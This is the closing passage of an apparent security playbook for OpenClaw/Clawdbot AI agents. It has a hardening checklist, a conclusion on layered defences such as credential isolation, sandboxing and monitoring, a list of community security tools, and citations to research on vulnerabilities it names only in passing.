[ ] SIEM forwarding configured and tested
[ ] Hash chain validation enabled
[ ] Sensitive data redaction active
[ ] Real-time alerting configured for high-risk patterns
Layer 7: Organizational Controls
[ ] openclaw-detect deployed via MDM
[ ] Shadow AI inventory complete
[ ] Security policy documented and enforced
[ ] Incident response playbook ready
[ ] Security team trained on agent-specific threats
→ Download production deployment checklist in PDF format for team distribution.
Conclusion: Building Trustworthy AI Agents
The vulnerabilities affecting 1,200+ Clawdbot instances - backup file persistence, localhost authentication bypass, 91.3% prompt injection success - demonstrate that agentic AI security requires fundamentally different approaches than traditional application security.
Key takeaways:
Defense-in-depth is mandatory: Single-layer security fails against multi-vector attacks
Community tools accelerate security: openclaw-detect, openclaw-telemetry, openclaw-shield, and clawguard provide production-ready defenses
Assume breach at every layer: Build systems that limit damage when compromise occurs
OS-level isolation matters: Plaintext credential storage is indefensible against modern malware
Network segmentation works: VPNs eliminate entire classes of authentication bypass vulnerabilities
Runtime enforcement prevents exploitation: Security plugins block malicious tool calls before execution
Behavioral monitoring detects novel attacks: Static defenses fail against 91.3% prompt injection success rates
The path forward:
Start with immediate mitigations from Part 1 (fixes active exploitation)
Implement OS credential isolation within two weeks (defeats infostealer malware)
Deploy community security tools (openclaw-shield, openclaw-telemetry, openclaw-detect)
Deploy VPN and container sandboxing within one month (reduces blast radius)
Establish continuous monitoring and incident response (detects compromise)
No security architecture is perfect. The goal is raising attacker cost while maintaining operational value. These seven defense layers - credential isolation, network segmentation, runtime sandboxing, runtime security enforcement, supply chain integrity, behavioral monitoring, and organizational controls - transform AI agents from privilege escalation paths into hardened production systems.
Additional Resources
Implementation Guides
Quick start guide - 5-minute security wins
Credential isolation - OS Keychain migration
Network segmentation - VPN setup
Runtime sandboxing - Container security
Supply chain security - Skill vetting
Incident response - Compromise procedures
Community tools integration - Deployment guide
Tools and Scripts
Browse all security scripts - Production-ready automation
Configuration templates - Hardened configs
Deployment examples - Real-world scenarios
Community Security Tools
openclaw-detect - Shadow AI discovery via MDM deployment
openclaw-telemetry - Enterprise telemetry with SIEM integration
openclaw-shield - 5-layer defense-in-depth security plugin
clawguard - JavaScript/TypeScript prompt injection guards
OpenClaw-Skills-Security - Pre-install skill and environment auditing for malicious skills, risky permissions, dependency issues, and runtime misconfiguration
AgentGuard - Runtime interception and deep scanning for high-risk agent actions, sensitive file writes, secrets, and prompt-injection threats
ai-bom - AI asset discovery across code, Docker, and cloud IaC with CycloneDX inventory generation and risk scoring
IronCurtain - Credential brokering architecture that keeps real secrets out of the agent runtime through proxy-based policy enforcement
MCPHammer - Red-teaming tool for testing malicious MCP server abuse, data exfiltration, and MCP supply-chain risks
Deterministic Agent Control Protocol - Experimental gateway for policy-based agent action control, tamper-evident logging, and reversible execution
AgentShield Benchmark - Comparative benchmark for agent-security tools covering detection quality, tool-abuse coverage, and overall effectiveness
Original Security Research
Key citations for technical claims:
BrandDefense: "1,200+ Clawdbot Instances Exposed" (Jan 27, 2026)
Bitdefender: "Clawdbot Gateway Authentication Bypass" (Jan 28, 2026)
Jamieson O'Reilly: "Poisoning the Clawdbot Skill Library" (Jan 15, 2026)
OX Security: "Credential Backup Persistence in OpenClaw" (Jan 29, 2026)
Hudson Rock: "Infostealer Adaptation to Clawdbot Disclosure" (Jan 31, 2026)
ZeroLeaks: "Clawdbot Prompt Injection Testing Results" (Jan 30, 2026)
Zenity Labs: "7,922 Attack Attempts in 72 Hours" (Jan 29, 2026)
Snyk: "Email-Based Prompt Injection Against AI Agents" (Feb 1, 2026)
Intruder.io: "Social Media Vectors for Agent Compromise" (Feb 2, 2026)
Gadi Evron: "openclaw-detect and openclaw-telemetry Release" (LinkedIn, Feb 1, 2026)
Knostic: "openclaw-shield: Preventing Secret Leaks and Destructive Commands" (Blog, Feb 4, 2026)
Found this helpful? Star the repository and share with your security team to improve AI agent security across your organization.
Questions or contributions? Open a GitHub issue or submit a pull request to openclaw-security-playbook.



